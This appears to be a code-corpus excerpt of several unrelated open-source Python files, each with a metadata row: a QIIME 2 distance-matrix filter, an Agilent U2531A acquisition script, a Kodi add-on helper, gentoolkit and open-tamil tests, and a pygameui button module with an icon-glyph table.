sys.exit('%s: errors %d' % (c, errors))
sys.exit(0)
| mit | 5,228,359,323,008,180,000 | 31.375 | 119 | 0.492761 | false |
maxvonhippel/q2-diversity | q2_diversity/_filter.py | 1 | 1145 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2017, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import skbio
import qiime2
def filter_distance_matrix(distance_matrix: skbio.DistanceMatrix,
metadata: qiime2.Metadata,
where: str=None,
exclude_ids: bool=False) -> skbio.DistanceMatrix:
ids_to_keep = metadata.ids(where=where)
if exclude_ids:
ids_to_keep = set(distance_matrix.ids) - set(ids_to_keep)
# NOTE: there is no guaranteed ordering to output distance matrix because
# `ids_to_keep` is a set, and `DistanceMatrix.filter` uses its iteration
# order.
try:
return distance_matrix.filter(ids_to_keep, strict=False)
except skbio.stats.distance.DissimilarityMatrixError:
raise ValueError(
"All samples were filtered out of the distance matrix.")
| bsd-3-clause | -3,368,935,227,757,453,300 | 41.407407 | 78 | 0.571179 | false |
lamotriz/sistemas-de-aterramento | src/agilent_u2531a.py | 1 | 14700 | # -*- coding: utf-8 -*-
# Comunicacao com a placa agilent U2531A
#
# UFC - Universidade de Federal do Ceará
#
# Responsáveis:
# Felipe Bandeira da Silva
# Francisco Alexander
#
from __future__ import division
import platform
#if platform.system() == 'Windows':
# import visa
#else:
# import visa_linux_emulation as visa
try:
import visa
except:
# Durante o processo de instalação normal usando o NSIS, o path do windows
# não estava atualizado com o Python, portanto não era possível, durante a instalação,
# a execução do pip para instalar o "pyvisa" que requer por natureza, várias
# dependências que são simplesmene tratadas pelo pip. Portanto para a primeira
# utilização do programa é necessário a utilização da internet.
#
# Para que tudo funcione corretamente e necessario pyvisa 1.4
#import pip
#pip.main(['install', 'pyvisa'])
import subprocess
print u"aviso: instalando o PyVISA 1.4"
subprocess.call(['pip', 'install', 'PyVISA==1.4'])
print u"aviso: instalacao finalizada"
import visa
import matplotlib.pyplot as plt
from time import sleep, time, asctime, localtime
import numpy as np
###############################################################################
# Constantes para correçao. As mesmas usadas pelo programa feito no LabView
###############################################################################
FATOR_CORRECAO_TENSAO = 100
FATOR_CORRECAO_CORRENTE = 2.71
# 0 - nao mostra as mensagens
# 1 - mostras as mensagens para debug
DEBUG = 0
# um pequeno pulso inicial é visto no inicio da
# aquisição, puro ruido. Para que o sinal seja
# visualizado corretamento foi necessário aumentar
# o número de aquisições. Isso implica em uma
# aquisição mais demorada.
#QUANTIDADE_PONTOS = 50000
QUANTIDADE_PONTOS = 800000
###############################################################################
# testBit() returns a nonzero result, 2**offset, if the bit at 'offset' is one.
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
# setBit() returns an integer with the bit at 'offset' set to 1.
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
# clearBit() returns an integer with the bit at 'offset' cleared.
def clearBit(int_type, offset):
mask = ~(1 << offset)
return(int_type & mask)
# toggleBit() returns an integer with the bit at 'offset' inverted, 0 -> 1 and 1 -> 0.
def toggleBit(int_type, offset):
mask = 1 << offset
return(int_type ^ mask)
def lerEndian(data):
"""
Converte um sequencia de dados em valores de 2 bytes
A sequencia de entrada é dada no formato little-endian
com entrada do 13 bit para o carry.
Entrada:
data = string pura com informacoes do bloco de bytes
Saída:
t = tamanho do vetor de bytes
v = valores em um vetor
"""
raw = data[10:]
valores = []
passo = 0
for i in raw:
if passo == 0:
lsb = i
passo = 1
elif passo == 1:
msb = i
passo = 0
num = ((ord(msb)<<8)+(ord(lsb)))>>2
#print hex(num)
valores.append(num)
return [len(valores), valores]
def ler2Endian(data):
"""
Ler um bloco de bytes composto por duas leitura simultaneas do canal.
"""
raw = data[10:]
A = []
B = []
passo = 0
for i in raw:
if passo == 0:
lsb = i
passo = 1
elif passo == 1:
msb = i
passo = 2
A.append(((ord(msb)<<8)+(ord(lsb)))>>2)
elif passo == 2:
lsb = i
passo = 3
elif passo == 3:
msb = i
passo = 0
B.append(((ord(msb)<<8)+(ord(lsb)))>>2)
return [len(A), A, B]
def convBIP(raw, range_ad=10, resolution=14):
v = []
for i in raw:
v.append( (2*i)/(2**resolution) * range_ad )
return v
def convUNI(raw, range_ad=10, resolution=14):
v = []
for i in raw:
# se o 13 bit do byte for 1 então o número é "negativo"
# a conversão unipolar é dada por
# MAX = 1FFF
# MAX/2 = 0000
# 0 = 2000
if testBit(i, 13) > 0:
valor = clearBit(i, 13) - (2**14)/2
v.append( (valor/(2**resolution) + 0.5)*range_ad )
else:
v.append( (i/(2**resolution) + 0.5)*range_ad )
return v
def lerTensaoCorrente(ag):
"""
Faz a leitura de dois canais de forma simultanea
Canal 101(corrente) e 102(tensão)
"""
# reseta a placa a de aquisição
ag.write("*CLS")
ag.write("*RST")
ag.write("ROUT:ENAB 0,(@103, 104)") # desabilita os canais 103 e 104
ag.write("ROUT:ENAB 1,(@101, 102)") # habilita os canais 101 e 102
ag.write("ROUT:CHAN:RANG 10,(@101, 102)") # coloca no mesmo nivel que o programa da National
ag.write("ROUT:CHAN:POL UNIP,(@101, 102)") # unipolar
ag.write("ACQ:SRAT 2000000") # frequencia de amostragem
#ag.write("ACQ:POIN 2000000")
#ag.write("ACQ:POIN 50000") # número de pontos para aquisição
ag.write("ACQ:POIN %d" % QUANTIDADE_PONTOS)
####################
# inicia aquisicao #
####################
ag.write("DIG")
disparaTensao(ag)
#ag.write("DIG")
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.2) # espera um tempo até que amostra fique pronta
# Uma pequena mudança no capacitor do primeiro 555
# faz com que o set e reset necessitem de um tempo
# maior para que ambos acontecam.
sleep(.2)
retiraTensao(ag)
ag.write("WAV:DATA?")
dados = ag.read()
t, I, V = ler2Endian(dados)
V = convUNI(V, 10)
I = convUNI(I, 10)
return [dados, V, I]
def lerTensao(ag):
"""
Ler apenas o canal de tensão da fonte. Canal 102
Com toda a sequencia de acionamento do set e reset.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
# inicia a leitura do canal 102 tensao
ag.write("ROUT:ENAB 0,(@103, 101, 104)")
ag.write("ROUT:ENAB 1,(@102)")
ag.write("ROUT:CHAN:RANG 10,(@102)") # coloca no mesmo nivel que o programa da National
ag.write("ROUT:CHAN:POL UNIP,(@102)")
ag.write("ACQ:SRAT 2000000")
#ag.write("ACQ:POIN 2000000")
#ag.write("ACQ:POIN 50000")
# um pequeno pulso inicial é visto no inicio da
# aquisição, puro ruido. Para que o sinal seja
# visualizado corretamento foi necessário aumentar
# o número de aquisições. Isso implica em uma
# aquisição mais demorada.
ag.write("ACQ:POIN %d" % (QUANTIDADE_PONTOS))
# inicia aquisicao
ag.write("DIG")
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.5)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R, 10)
plt.grid()
plt.plot(range(0, t), V)
plt.show()
return t, V
def lerCorrente(ag):
"""
Ler apenas o canal de corrente da fonte. Canal 101
Com toda a sequencia de acionamento do set e reset.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
# inicia a leitura do canal 101 corrente
ag.write("ROUT:ENAB 0,(@103, 102, 104)")
ag.write("ROUT:ENAB 1,(@101)")
ag.write("ROUT:CHAN:RANG 10,(@101)")
ag.write("ROUT:CHAN:POL UNIP,(@101)")
ag.write("ACQ:SRAT 2000000")
ag.write("ACQ:POIN 2000000")
# inicia aquisicao
ag.write("DIG")
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.5)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R, 10)
plt.grid()
plt.plot(range(0, t), V)
plt.show()
return t, V
def lerCanal103(ag):
"""
Este canal foi usado para os testes iniciais da conversão
do análogico digital. Não sendo mais necessário.
As funçoes para leitura de tensão e corrente são identicas
a esta funçao. Mudando apenas o canal.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
# inicia a leitura do canal 103
ag.write("ROUT:ENAB 0,(@101, 102, 104)")
ag.write("ROUT:ENAB 1,(@103)")
ag.write("ROUT:CHAN:RANG 10,(@103)")
#ag.write("ROUT:CHAN:POL BIP,(@103)")
ag.write("ROUT:CHAN:POL UNIP,(@103)")
ag.write("ACQ:SRAT 2000000")
ag.write("ACQ:POIN 2000000")
# inicia aquisicao
ag.write("DIG")
# espera o fim
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.1)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R)
plt.grid()
plt.plot(range(0, t), V)
return t, V
def disparaTensao(ag):
"""
Envia um pulso de alta tensão para o sistema de aterramento.
Acionando para isto o primeiro 555.
Os pulso não deve ser enviando em um curto intervalo de tempo
já que a fonte não foi projetada para tal situaçao.
Portanto deve-se tormar cuidado no acionamento sequencia.
SET - Pino 68 na placa U2901-60602
RESET - Pino 34 na placa U2901-60602
"""
ag.write("CONF:DIG:DIR OUTP,(@501)")
ag.write("SOUR:DIG:DATA 1,(@501)")
return 0
def retiraTensao(ag):
"""
Reseta a fonte. Habilitando a mesma para um novo envio
de um pulso de alta tensão.
"""
ag.write("CONF:DIG:DIR OUTP,(@501)")
ag.write("SOUR:DIG:DATA 0,(@501)") # desabilita o set
sleep(0.1) # espera um tempo para resetar
ag.write("SOUR:DIG:DATA 2,(@501)") # reseta a fonte
sleep(0.1) # espera um tempo para entrar em repouso
ag.write("SOUR:DIG:DATA 0,(@501)") # entra em repouso
return 0
def pltTensaoCorrente(V, I):
t1 = np.arange(0, len(V))
plt.figure(1)
plt.title("Leitura do U2531A")
plt.subplot(211)
plt.plot(t1, V)
plt.subplot(212)
plt.plot(t1, I)
plt.show()
def aplicaCorrecoes(V, I):
V = np.array(V)
V = FATOR_CORRECAO_TENSAO * V
I = np.array(I)
I = FATOR_CORRECAO_CORRENTE * I
return [V, I]
def sequenciaAquisicoes(ag, quantidade, local="C:\\Temp", rotulo = '0'):
"""
Faz um aquisiçao sequencial dos canais de tensão e corrente.
ag = objeto usada para o controle da placa
"""
print "Iniciando aquisicao sequencial"
print "Equipamento = ", ag
print "quantidade = ", quantidade
print "Tempo de inicio = ", asctime()
tempoInicio = time()
contagem = quantidade
plt.figure(1)
while quantidade > 0:
print "Atual = ", quantidade
tempoIndividual = time()
# inicia aquisição
raw, V, I = lerTensaoCorrente(ag)
V, I = aplicaCorrecoes(V, I)
# não é uma boa ideia plotar desta forma
#pltTensaoCorrente(V, I)
plt.subplot(211)
plt.plot(np.arange(0, len(V)), V)
plt.subplot(212)
plt.plot(np.arange(0, len(I)), I)
salvaTensaoTXT(local, rotulo, contagem-quantidade+1, V)
salvaCorrenteTXT(local, rotulo, contagem-quantidade+1, I)
print "Individual = ", time()-tempoIndividual
quantidade -=1
total = time()-tempoInicio
print 'Completo em [seg]: ', total
plt.show()
return 0
def salvaTensaoTXT(local, rotulo, posicao, V):
"""
Salva o vetor tensão em um arquivo com nome formatado para isso
"""
nomeCompleto = local+"\\"+rotulo+"V"+str(posicao)+".txt"
return salvaTXT(nomeCompleto, V)
def salvaCorrenteTXT(local, rotulo, posicao, I):
"""
Salva o vetor corrente em um arquivo com nome formatado para isso
"""
nomeCompleto = local+"\\"+rotulo+"I"+str(posicao)+".txt"
return salvaTXT(nomeCompleto, I)
def salvaTXT(caminhoCompleto, vetor):
"""
Salva em um arquivo txt os valores de um vetor
onde a primeira coluna informa o indice e a segunda
coluna informa o valor para o indice.
"""
try:
arquivo = open(caminhoCompleto, 'w')
except:
print 'erro: nao foi possivel escrever no arquivo'
print ' : ', caminhoCompleto
return -1
#for i in range(len(vetor)):
# string = "%d %f\n" % (i, float(vetor[i]))
# arquivo.write(string)
for i in vetor:
arquivo.write(i)
arquivo.close()
# escrita finalizada com sucesso
return 0
def buscaAgilent():
"""
Busca o equipamento conectado a porta usb do computador
Retornando o objeto a ser usado pelas funções de controle
da placa de aquisiçao da agilent.
"""
listaInstrumentos = visa.get_instruments_list() # adquiri a lista de equipamentos conectados ao computador
listaAgilent = listaInstrumentos[0] # pega o primeiro equipamento
print 'Lista de instrumentos:'
print listaAgilent # espera-se que o equipamento seja da agilent
ag = visa.instrument(listaAgilent) # cria um objeto a ser manipulado e passado para as outras funções
identificacao = ag.ask("*IDN?")
print identificacao
return ag
###############################################################################
# MAIN #
###############################################################################
if __name__ == '__main__':
print 'Agilente U3125A'
ag = buscaAgilent()
##############################
# leitura de apenas um canal #
##############################
#lerCanal103(ag)
#lerTensao(ag)
#lerCorrente(ag)
##########################
# leitura de dois canais #
##########################
raw, V, I = lerTensaoCorrente(ag)
V, I = aplicaCorrecoes(V, I)
pltTensaoCorrente(V, I)
#########################
# Aquisiçoes sequencial #
#########################
# 60 aquisições
# local onde é salvo "C:\Temp"
#sequenciaAquisicoes(ag, 10)
| apache-2.0 | -3,173,579,012,957,982,000 | 25.769231 | 110 | 0.557373 | false |
argivaitv/argivaitv | plugin.video.salts/salts_lib/kodi.py | 1 | 4210 | """
SALTS XBMC Addon
Copyright (C) 2015 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcaddon
import xbmcplugin
import xbmcgui
import xbmc
import xbmcvfs
import urllib
import urlparse
import sys
import os
import re
addon = xbmcaddon.Addon()
ICON_PATH = os.path.join(addon.getAddonInfo('path'), 'icon.png')
get_setting = addon.getSetting
show_settings = addon.openSettings
def get_path():
return addon.getAddonInfo('path')
def get_profile():
return addon.getAddonInfo('profile')
def set_setting(id, value):
if not isinstance(value, basestring): value = str(value)
addon.setSetting(id, value)
def get_version():
return addon.getAddonInfo('version')
def get_id():
return addon.getAddonInfo('id')
def get_name():
return addon.getAddonInfo('name')
def get_plugin_url(queries):
try:
query = urllib.urlencode(queries)
except UnicodeEncodeError:
for k in queries:
if isinstance(queries[k], unicode):
queries[k] = queries[k].encode('utf-8')
query = urllib.urlencode(queries)
return sys.argv[0] + '?' + query
def end_of_directory(cache_to_disc=True):
xbmcplugin.endOfDirectory(int(sys.argv[1]), cacheToDisc=cache_to_disc)
def create_item(queries, label, thumb='', fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
list_item = xbmcgui.ListItem(label, iconImage=thumb, thumbnailImage=thumb)
add_item(queries, list_item, fanart, is_folder, is_playable, total_items, menu_items, replace_menu)
def add_item(queries, list_item, fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
if menu_items is None: menu_items = []
if is_folder is None:
is_folder = False if is_playable else True
if is_playable is None:
playable = 'false' if is_folder else 'true'
else:
playable = 'true' if is_playable else 'false'
liz_url = get_plugin_url(queries)
if fanart: list_item.setProperty('fanart_image', fanart)
list_item.setInfo('video', {'title': list_item.getLabel()})
list_item.setProperty('isPlayable', playable)
list_item.addContextMenuItems(menu_items, replaceItems=replace_menu)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), liz_url, list_item, isFolder=is_folder, totalItems=total_items)
def parse_query(query):
q = {'mode': 'main'}
if query.startswith('?'): query = query[1:]
queries = urlparse.parse_qs(query)
for key in queries:
if len(queries[key]) == 1:
q[key] = queries[key][0]
else:
q[key] = queries[key]
return q
def notify(header=None, msg='', duration=2000, sound=None):
if header is None: header = get_name()
if sound is None: sound = get_setting('mute_notifications') == 'false'
xbmcgui.Dialog().notification(header, msg, ICON_PATH, duration, sound)
def get_current_view():
skinPath = xbmc.translatePath('special://skin/')
xml = os.path.join(skinPath, 'addon.xml')
f = xbmcvfs.File(xml)
read = f.read()
f.close()
try: src = re.search('defaultresolution="([^"]+)', read, re.DOTALL).group(1)
except: src = re.search('<res.+?folder="([^"]+)', read, re.DOTALL).group(1)
src = os.path.join(skinPath, src, 'MyVideoNav.xml')
f = xbmcvfs.File(src)
read = f.read()
f.close()
match = re.search('<views>([^<]+)', read, re.DOTALL)
if match:
views = match.group(1)
for view in views.split(','):
if xbmc.getInfoLabel('Control.GetLabel(%s)' % (view)): return view
| gpl-2.0 | -4,517,156,319,772,024,300 | 33.793388 | 139 | 0.670784 | false |
dol-sen/gentoolkit | pym/gentoolkit/test/test_cpv.py | 1 | 4129 | #!/usr/bin/python
#
# Copyright(c) 2009, Gentoo Foundation
#
# Licensed under the GNU General Public License, v2
#
# $Header$
import unittest
from gentoolkit.cpv import *
from gentoolkit.test import cmp
class TestGentoolkitCPV(unittest.TestCase):
def assertEqual2(self, o1, o2):
# logic bugs hidden behind short circuiting comparisons for metadata
# is why we test the comparison *both* ways.
self.assertEqual(o1, o2)
c = cmp(o1, o2)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r, aren't equal: got %i" % (o1, o2, c))
self.assertEqual(o2, o1)
c = cmp(o2, o1)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r,aren't equal: got %i" % (o2, o1, c))
def assertNotEqual2(self, o1, o2):
# is why we test the comparison *both* ways.
self.assertNotEqual(o1, o2)
c = cmp(o1, o2)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o1, o2, c))
self.assertNotEqual(o2, o1)
c = cmp(o2, o1)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o2, o1, c))
def test_comparison(self):
self.assertEqual2(CPV('pkg'), CPV('pkg'))
self.assertNotEqual2(CPV('pkg'), CPV('pkg1'))
self.assertEqual2(CPV('cat/pkg'), CPV('cat/pkg'))
self.assertNotEqual2(CPV('cat/pkg'), CPV('cat/pkgb'))
self.assertNotEqual2(CPV('cata/pkg'), CPV('cat/pkg'))
self.assertEqual2(CPV('cat/pkg-0.1'), CPV('cat/pkg-0.1'))
self.assertNotEqual2(CPV('cat/pkg-1.0'), CPV('cat/pkg-1'))
self.assertEqual2(CPV('cat/pkg-0'), CPV('cat/pkg-0'))
self.assertEqual2(CPV('cat/pkg-1-r1'), CPV('cat/pkg-1-r1'))
self.assertNotEqual2(CPV('cat/pkg-2-r1'), CPV('cat/pkg-2-r10'))
self.assertEqual2(CPV('cat/pkg-1_rc2'), CPV('cat/pkg-1_rc2'))
self.assertNotEqual2(CPV('cat/pkg-2_rc2-r1'), CPV('cat/pkg-2_rc1-r1'))
def test_compare_strs(self):
# Test ordering of package strings, Portage has test for vercmp,
# so just do the rest
version_tests = [
# different categories
('sys-apps/portage-2.1.6.8', 'sys-auth/pambase-20080318'),
# different package names
('sys-apps/pkgcore-0.4.7.15-r1', 'sys-apps/portage-2.1.6.8'),
# different package versions
('sys-apps/portage-2.1.6.8', 'sys-apps/portage-2.2_rc25')
]
# Check less than
for vt in version_tests:
self.failUnless(compare_strs(vt[0], vt[1]) == -1)
# Check greater than
for vt in version_tests:
self.failUnless(compare_strs(vt[1], vt[0]) == 1)
# Check equal
vt = ('sys-auth/pambase-20080318', 'sys-auth/pambase-20080318')
self.failUnless(compare_strs(vt[0], vt[1]) == 0)
def test_chunk_splitting(self):
all_tests = [
# simple
('sys-apps/portage-2.2', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2',
'revision': '',
'fullversion': '2.2'
}),
# with rc
('sys-apps/portage-2.2_rc10', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': '',
'fullversion': '2.2_rc10'
}),
# with revision
('sys-apps/portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
# with dash (-) in name (Bug #316961)
('c-portage', {
'category': '',
'name': 'c-portage',
'cp': 'c-portage',
'version': '',
'revision': '',
'fullversion': ''
}),
# with dash (-) in name (Bug #316961)
('sys-apps/c-portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'c-portage',
'cp': 'sys-apps/c-portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
]
for test in all_tests:
cpv = CPV(test[0])
keys = ('category', 'name', 'cp', 'version', 'revision', 'fullversion')
for k in keys:
self.failUnlessEqual(
getattr(cpv, k), test[1][k]
)
def test_main():
suite = unittest.TestLoader().loadTestsFromTestCase(TestGentoolkitCPV)
unittest.TextTestRunner(verbosity=2).run(suite)
test_main.__test__ = False
if __name__ == '__main__':
test_main()
| gpl-2.0 | 9,081,922,295,895,087,000 | 28.283688 | 74 | 0.614434 | false |
Ezhil-Language-Foundation/open-tamil | tests/solthiruthi_data_parser.py | 1 | 1780 | # -*- coding: utf-8 -*-
# (C) 2015 Muthiah Annamalai
# setup the paths
from opentamiltests import *
from solthiruthi.data_parser import *
from solthiruthi.solthiruthi import Solthiruthi
import sys
class CmdLineIO(unittest.TestCase):
def test_CLI_interface_help(self):
return
# find a way to run this test which exits the suite
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(["--help"])
self.assertEqual(args.help, True)
def test_CLI_defaults(self):
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(["-stdin"])
self.assertEqual(args.files, "")
self.assertEqual(args.help, False)
self.assertEqual(args.nalt, 10)
self.assertEqual(args.Dictionary, ["std"])
self.assertEqual(args.dialects, ["std"])
def test_CLI_files(self):
ips = ["-files", "poonga", "vanam", "sethu", "ezhuthu"]
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(ips)
self.assertEqual(args.files, ips[1:])
def test_CLI_dicts(self):
ips = ["-Dict", "std", "wikipedia", "madurai"]
_, parser = Solthiruthi.get_CLI_options(do_parse=False)
args = parser.parse_args(ips)
self.assertEqual(args.Dictionary, ips[1:])
class DataParserTest(unittest.TestCase):
def test_worlists(self):
obj = DataParser.run(["data/maligaiporul.txt", "data/vilangugal.txt"])
r = obj.analysis()
self.assertEqual(r["catlen"], 5)
# self.assertEqual(r['total'],141)
self.assertEqual(
sorted(list(map(len, r["dict"].values()))), sorted([56, 28, 15, 8, 3])
)
if __name__ == "__main__":
unittest.main()
| mit | -1,105,546,994,034,957,800 | 32.584906 | 82 | 0.617416 | false |
jwayneroth/mpd-touch | pygameui/button.py | 1 | 11634 | import label
import callback
import theme
import pygame
import view
import imageview
CENTER = 0
LEFT = 1
RIGHT = 2
TOP = 3
BOTTOM = 4
WORD_WRAP = 0
CLIP = 1
"""
Button
A button with a text caption.
Essentially an interactive label.
Signals
on_clicked(button, mousebutton)
"""
class Button(label.Label):
def __init__(self, frame, caption, halign=CENTER, valign=CENTER, wrap=CLIP):
if frame.h == 0:
frame.h = theme.current.button_height
label.Label.__init__(self, frame, caption,halign, valign,wrap)
self._enabled = True
self.on_clicked = callback.Signal()
def layout(self):
label.Label.layout(self)
if self.frame.w == 0:
self.frame.w = self.text_size[0] + self.padding[0] * 2
label.Label.layout(self)
def mouse_up(self, button, point):
self.on_clicked(self, button)
"""
ImageButton
A button that uses an image instead of a text caption.
"""
class ImageButton(view.View):
def __init__(self, frame, image):
if frame is None:
frame = pygame.Rect((0, 0), image.get_size())
elif frame.w == 0 or frame.h == 0:
frame.size = image.get_size()
view.View.__init__(self, frame)
self.on_clicked = callback.Signal()
self.image_view = imageview.ImageView(pygame.Rect(0, 0, 0, 0), image)
self.image_view._enabled = False
self.add_child(self.image_view)
def layout(self):
self.frame.w = self.padding[0] * 2 + self.image_view.frame.w
self.frame.h = self.padding[1] * 2 + self.image_view.frame.h
self.image_view.frame.topleft = self.padding
self.image_view.layout()
view.View.layout(self)
def mouse_up(self, button, point):
self.on_clicked(self, button)
"""
IconButton
"""
class IconButton(Button):
def __init__(self, frame, icon_class='cd', caption=''):
self.classes = {
'asterisk' : u'\u002a',
'plus' : u'\u002b',
'euro' : u'\u20ac',
'eur' : u'\u20ac',
'minus' : u'\u2212',
'cloud' : u'\u2601',
'envelope' : u'\u2709',
'pencil' : u'\u270f',
'glass' : u'\ue001',
'music' : u'\ue002',
'search' : u'\ue003',
'heart' : u'\ue005',
'star' : u'\ue006',
'star-empty' : u'\ue007',
'user' : u'\ue008',
'film' : u'\ue009',
'th-large' : u'\ue010',
'th' : u'\ue011',
'th-list' : u'\ue012',
'ok' : u'\ue013',
'remove' : u'\ue014',
'zoom-in' : u'\ue015',
'zoom-out' : u'\ue016',
'off' : u'\ue017',
'signal' : u'\ue018',
'cog' : u'\ue019',
'trash' : u'\ue020',
'home' : u'\ue021',
'file' : u'\ue022',
'time' : u'\ue023',
'road' : u'\ue024',
'download-alt' : u'\ue025',
'download' : u'\ue026',
'upload' : u'\ue027',
'inbox' : u'\ue028',
'play-circle' : u'\ue029',
'repeat' : u'\ue030',
'refresh' : u'\ue031',
'list-alt' : u'\ue032',
'lock' : u'\ue033',
'flag' : u'\ue034',
'headphones' : u'\ue035',
'volume-off' : u'\ue036',
'volume-down' : u'\ue037',
'volume-up' : u'\ue038',
'qrcode' : u'\ue039',
'barcode' : u'\ue040',
'tag' : u'\ue041',
'tags' : u'\ue042',
'book' : u'\ue043',
'bookmark' : u'\ue044',
'print' : u'\ue045',
'camera' : u'\ue046',
'font' : u'\ue047',
'bold' : u'\ue048',
'italic' : u'\ue049',
'text-height' : u'\ue050',
'text-width' : u'\ue051',
'align-left' : u'\ue052',
'align-center' : u'\ue053',
'align-right' : u'\ue054',
'align-justify' : u'\ue055',
'list' : u'\ue056',
'indent-left' : u'\ue057',
'indent-right' : u'\ue058',
'facetime-video' : u'\ue059',
'picture' : u'\ue060',
'map-marker' : u'\ue062',
'adjust' : u'\ue063',
'tint' : u'\ue064',
'edit' : u'\ue065',
'share' : u'\ue066',
'check' : u'\ue067',
'move' : u'\ue068',
'step-backward' : u'\ue069',
'fast-backward' : u'\ue070',
'backward' : u'\ue071',
'play' : u'\ue072',
'pause' : u'\ue073',
'stop' : u'\ue074',
'forward' : u'\ue075',
'fast-forward' : u'\ue076',
'step-forward' : u'\ue077',
'eject' : u'\ue078',
'chevron-left' : u'\ue079',
'chevron-right' : u'\ue080',
'plus-sign' : u'\ue081',
'minus-sign' : u'\ue082',
'remove-sign' : u'\ue083',
'ok-sign' : u'\ue084',
'question-sign' : u'\ue085',
'info-sign' : u'\ue086',
'screenshot' : u'\ue087',
'remove-circle' : u'\ue088',
'ok-circle' : u'\ue089',
'ban-circle' : u'\ue090',
'arrow-left' : u'\ue091',
'arrow-right' : u'\ue092',
'arrow-up' : u'\ue093',
'arrow-down' : u'\ue094',
'share-alt' : u'\ue095',
'resize-full' : u'\ue096',
'resize-small' : u'\ue097',
'exclamation-sign' : u'\ue101',
'gift' : u'\ue102',
'leaf' : u'\ue103',
'fire' : u'\ue104',
'eye-open' : u'\ue105',
'eye-close' : u'\ue106',
'warning-sign' : u'\ue107',
'plane' : u'\ue108',
'calendar' : u'\ue109',
'random' : u'\ue110',
'comment' : u'\ue111',
'magnet' : u'\ue112',
'chevron-up' : u'\ue113',
'chevron-down' : u'\ue114',
'retweet' : u'\ue115',
'shopping-cart' : u'\ue116',
'folder-close' : u'\ue117',
'folder-open' : u'\ue118',
'resize-vertical' : u'\ue119',
'resize-horizontal' : u'\ue120',
'hdd' : u'\ue121',
'bullhorn' : u'\ue122',
'bell' : u'\ue123',
'certificate' : u'\ue124',
'thumbs-up' : u'\ue125',
'thumbs-down' : u'\ue126',
'hand-right' : u'\ue127',
'hand-left' : u'\ue128',
'hand-up' : u'\ue129',
'hand-down' : u'\ue130',
'circle-arrow-right' : u'\ue131',
'circle-arrow-left' : u'\ue132',
'circle-arrow-up' : u'\ue133',
'circle-arrow-down' : u'\ue134',
'globe' : u'\ue135',
'wrench' : u'\ue136',
'tasks' : u'\ue137',
'filter' : u'\ue138',
'briefcase' : u'\ue139',
'fullscreen' : u'\ue140',
'dashboard' : u'\ue141',
'paperclip' : u'\ue142',
'heart-empty' : u'\ue143',
'link' : u'\ue144',
'phone' : u'\ue145',
'pushpin' : u'\ue146',
'usd' : u'\ue148',
'gbp' : u'\ue149',
'sort' : u'\ue150',
'sort-by-alphabet' : u'\ue151',
'sort-by-alphabet-alt' : u'\ue152',
'sort-by-order' : u'\ue153',
'sort-by-order-alt' : u'\ue154',
'sort-by-attributes' : u'\ue155',
'sort-by-attributes-alt' : u'\ue156',
'unchecked' : u'\ue157',
'expand' : u'\ue158',
'collapse-down' : u'\ue159',
'collapse-up' : u'\ue160',
'log-in' : u'\ue161',
'flash' : u'\ue162',
'log-out' : u'\ue163',
'new-window' : u'\ue164',
'record' : u'\ue165',
'save' : u'\ue166',
'open' : u'\ue167',
'saved' : u'\ue168',
'import' : u'\ue169',
'export' : u'\ue170',
'send' : u'\ue171',
'floppy-disk' : u'\ue172',
'floppy-saved' : u'\ue173',
'floppy-remove' : u'\ue174',
'floppy-save' : u'\ue175',
'floppy-open' : u'\ue176',
'credit-card' : u'\ue177',
'transfer' : u'\ue178',
'cutlery' : u'\ue179',
'header' : u'\ue180',
'compressed' : u'\ue181',
'earphone' : u'\ue182',
'phone-alt' : u'\ue183',
'tower' : u'\ue184',
'stats' : u'\ue185',
'sd-video' : u'\ue186',
'hd-video' : u'\ue187',
'subtitles' : u'\ue188',
'sound-stereo' : u'\ue189',
